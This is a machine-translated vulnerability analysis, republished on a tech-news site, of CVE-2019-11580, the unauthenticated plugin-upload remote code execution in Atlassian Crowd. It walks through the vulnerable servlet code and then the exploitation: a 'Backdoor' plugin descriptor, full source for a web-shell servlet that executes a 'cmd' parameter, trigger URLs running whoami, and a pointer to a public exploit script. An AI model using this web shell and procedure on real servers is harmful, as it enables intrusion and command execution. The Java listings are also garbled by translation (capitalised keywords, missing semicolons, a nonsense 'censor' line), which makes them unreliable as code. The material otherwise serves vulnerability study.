Shulou(Shulou.com)05/31 Report--

This article introduces how to analyze CVE-2019-11580 vulnerabilities in FireEye. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

Preface

FireEye, the world's leading cyber security company, is suspected of being attacked by an APT organization. A large number of its government customers' information has been accessed without authorization, and red team tools have been stolen. Although it is not clear what will be done with these red team tools, FireEye has posted some responses on GitHub. Qianxin Code Security Lab will analyze and reproduce the relevant vulnerabilities in the GitHub warehouse from a technical point of view, hoping to bring some inspiration to readers and make good defense.

Attackers can take advantage of code execution vulnerabilities to execute arbitrary code on the server side to achieve goals such as system information theft, thus causing great harm. Atlassian Crowd is an enterprise identity management application with identity management and single sign-on capabilities, which is further extended through plug-ins. There is a security flaw in Atlassian Crowd's plug-in pdkinstall, which can easily cause attackers to upload and install malicious plug-ins so as to achieve the purpose of remote code execution.

Code analysis

This section mainly analyzes the pdkinstall plug-in information for Atlassian Crowd. Enter the command [git clone https://bitbucket.org/atlassian/pdkinstall-plugin] to download the plug-in source code and open it using IDEA, as shown below.

First, analyze the plug-in description file [atlassian-plugin.xml]. This file uses XML format data to focus on the plug-in module and servlet associated information, the content is as follows.

The red area in the figure shows that the access / admin/uploadplugin.action will call the servlet function class com.atlassian.pdkinstall.PdkInstallFilter to complete the upload, detection and installation of the new plug-in. So lock this class as a security flaw entry.

Then, analyze its source code. In the source code, the doFilter () function is the core function, which involves key plug-in logic control statements, so we analyze the source code of this function in two parts. The source code and parsing of part 1 are as follows.

Public void doFilter (ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {

HttpServletRequest req = (HttpServletRequest) servletRequest

HttpServletResponse res = (HttpServletResponse) servletResponse

/ / error will be reported if it is not a post request

If (! req.getMethod () .equalsIgnoreCase ("post")

{

Res.sendError (HttpServletResponse.SC_BAD_REQUEST, "Requires post")

Return

}

/ / check whether the data is in multipart format.

/ / in the data packet, Content-Type is used to indicate the MIME type of the resource, and the multipart/mixed type is mainly used to transfer valid (binary data, etc.) data files.

/ / Check that we have a file upload request

File tmp = null

Boolean isMultipart = ServletFileUpload.isMultipartContent (req)

If (isMultipart)

{

/ / extract the jar file directly from the package to continue to install the plug-in

Tmp = extractJar (req, res, tmp)

}

Else

{

/ / combine data from the package to build and install plug-ins

Tmp = buildJarFromFiles (req)

}

This method first discriminates the admission POST request, and then checks whether the Conten-Type type of the packet is multipart: if so, the jar file plug-in is extracted directly from the packet; otherwise, the jar file plug-in is built and installed from the packet.

Because this function code follows the tmp variable to carry out the discrimination task, it is necessary for us to go deep into the tmp variable value information returned by the relevant function analysis. Enter the extractJar () function to analyze the jar file plug-in extraction process as follows; the buildJarFromFiles () function analysis process is similar and will not be repeated here.

Private File extractJar (HttpServletRequest req, HttpServletResponse res, File tmp) throws IOException

{

/ / Create a new file upload handler

ServletFileUpload upload = new ServletFileUpload (factory)

/ / Parse the request

Try {

/ / the newly created file upload instance parses the request packet, thus parsing the plug-in in multipart/mixed format

List items = upload.parseRequest (req)

For (FileItem item: items)

{

/ / if the parsed data field begins with "file_" and does not belong to the table field, it is determined to be plug-in information, and the plug-in is created accordingly, and the plug-in is stored in the tmp variable at the index location on the server.

If (item.getFieldName () .startsWith ("file_") &! item.isFormField ())

{

Tmp = File.createTempFile ("plugindev-", item.getName ())

Tmp.renameTo (new File (tmp.getParentFile (), item.getName ()

Item.write (tmp)

}

}

} catch (FileUploadException e) {

Log.warn (e, e)

Res.sendError (HttpServletResponse.SC_BAD_REQUEST, "Unable to process file upload")

} catch (Exception e) {

Log.warn (e, e)

Res.sendError (HttpServletResponse.SC_INTERNAL_SERVER_ERROR, "Unable to process file upload")

}

/ / return plug-in index location information

Return tmp

}

Analysis shows that if there is a file in the packet that starts with "file_" and is not a form field, create the plug-in accordingly, and save the plug-in's server location index to the tmp variable; otherwise, leave the tmp variable as "null". Finally, the tmp variable is returned.

Let's move on to the second part of the doFilter () function, as follows.

/ / tmp is not empty, make sure it is the plug-in upload installation request and the plug-in has been probed and uploaded, start to install the plug-in, otherwise the response message "Missing plugin file"

If (tmp! = null)

{

List errors = new ArrayList ()

Try

{

/ / install the plug-in

Errors.addAll (pluginInstaller.install (tmp))

}

Catch (Exception ex)

{

Log.error (ex)

Errors.add (ex.getMessage ())

}

Tmp.delete ()

If (errors.isEmpty ())

{

/ / successfully installed, respond to "Installed plugin" + "specific path"

Res.setStatus (HttpServletResponse.SC_OK)

ServletResponse.setContentType ("text/plain")

ServletResponse.getWriter () .println ("Installed plugin" + tmp.getPath ()

}

Else

{

/ / installation failed, respond to "Unable to install plugin:"

Res.setStatus (HttpServletResponse.SC_BAD_REQUEST)

ServletResponse.setContentType ("text/plain")

ServletResponse.getWriter () .println ("Unable to install plugin:")

For (String err: errors)

{

ServletResponse.getWriter () .println ("\ t -" + err)

}

}

ServletResponse.getWriter () .close ()

Return

}

Res.sendError (HttpServletResponse.SC_BAD_REQUEST, "Missing plugin file")

}

According to the analysis, if the tmp variable is not empty, the plug-in installation starts, and the successful installation returns the response information "Installed plugin" + "specific path", and the installation failure returns the response information "Unable to install plugin:"; if the tmp variable is empty, the response information "Missing plugin file" is returned.

So far, after clarifying the plug-in management process of Atlassian Crowd, we can see that there is no clear plug-in function detection mechanism, so plug-ins are easy to be used.

Vulnerability exploitation

First, write a malicious plug-in with the "atlassian-plugin.xml" message as follows.

True

Atlassian Management plugin

1.0.0

/ exp

Backdoor at / plugins/servlet/cdl

According to the analysis, after the plug-in is uploaded successfully, users only need to visit / exp to use the function of the malicious plug-in servlet class com.cdl.shell.exp.

Secondly, analyze the com.cdl.shell.exp source code as follows:

Public class exp extends javax.servlet.http.HttpServlet {

Public void doGet (HttpServletRequest req, HttpServletResponse res) {

Try {

/ / receive cmd parameter information

String cmd=String.valueOf (req.getParameter ("cmd"))

String output= ""

Try {

If (! cmd.equals ("")) {

/ / execute cmd parameter command

Process p=Runtime.getRuntime () exec (cmd)

InputStream out=p.getInputStream ()

InputStream err=p.getErrorStream ()

Int censor'\ 0'

While ((c=out.read ())! =-1) {

Res.getWriter () .write ((char) c)

}

}

} catch (Exception ex) {

Output+= "\ n" + ex.toString ()

}

} catch (Exception e) {

E.printStackTrace ()

}

}

}

It can be seen that the function of this exp is to read and execute cmd parameter values.

Finally, edit the request packet to upload the malicious plug-in, and then type [http://localhost:8095/crowd/plugins/servlet/exp?cmd=whoami] in the browser to execute the "whoami" command. By observing the response information of the server (below), we can see that the vulnerability was exploited successfully.

Reappearance

First, download [atlassian-crowd-3.4.3]. After the configuration is started, visit [http://localhost:8095/crowd], and the following interface appears to indicate that the crowd service has been built successfully.

The second step is to visit the link [https://github.com/jas502n/CVE-2019-11580] to download malicious plug-ins and other materials, and then execute the [CVE-2019-11580.py] script. The following interface indicates that the plug-ins are uploaded and installed successfully.

The third step is to visit the link [http://localhost:8095/crowd/plugins/servlet/exp?cmd=whoami] in the browser. If the following interface appears, the code execution vulnerability will be triggered successfully.

Patch

Upgrade to the latest version.

Through the analysis of Atlassian Crowd RCE, the author believes that the root cause of this vulnerability is that the plug-in management system does not fully test the security of foreign plug-ins; in the study of related vulnerabilities, we should improve the dynamic debugging capabilities of Atlassian Crowd, plug-in analysis and development capabilities, as well as Java and Python development capabilities.

On how to carry out FireEye CVE-2019-11580 vulnerability analysis is shared here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.